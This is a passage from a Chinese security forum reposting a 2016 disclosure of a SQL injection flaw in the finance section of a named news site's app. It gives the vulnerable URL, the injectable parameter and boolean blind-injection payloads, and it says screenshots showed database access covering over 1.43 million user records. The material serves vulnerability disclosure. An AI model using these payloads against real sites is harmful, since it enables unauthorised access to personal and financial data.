HanDs
NO.2

[7月漏洞公开] 凤凰网app另一处SQL注入(涉及143W+用户信息/大量财务数据) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

详细说明:

目标:app.finance.ifeng.com

检测发现以下地方存在SQL注入:(注入参数organ,布尔盲注/union query)

code 区域
http://app.finance.ifeng.com/wgsearch/index.php?code=600234&begin=2016-03-05&end=2016-05-31&organ=中国证券监督管理委员会



Payload:

code 区域
organ=中国证券监督管理委员会' and 'a'='a



code 区域
organ=中国证券监督管理委员会' and 'a'='b

漏洞证明:

1、当前数据库用户

user.jpg



2、所有数据库

dbs.jpg



3、数据表,涉及143W+用户信息/大量财务数据,仅以行数作证,具体就不深入了

0.jpg



1.jpg



2.jpg



4.jpg

修复方案:

请多指教~


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
凤凰网 a pp
#1楼
发帖时间:2016-7-16   |   查看数:0   |   回复数:1
baobao3950
雪绒花LV22


学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

完全看不懂

2016-7-20 #2楼
游客组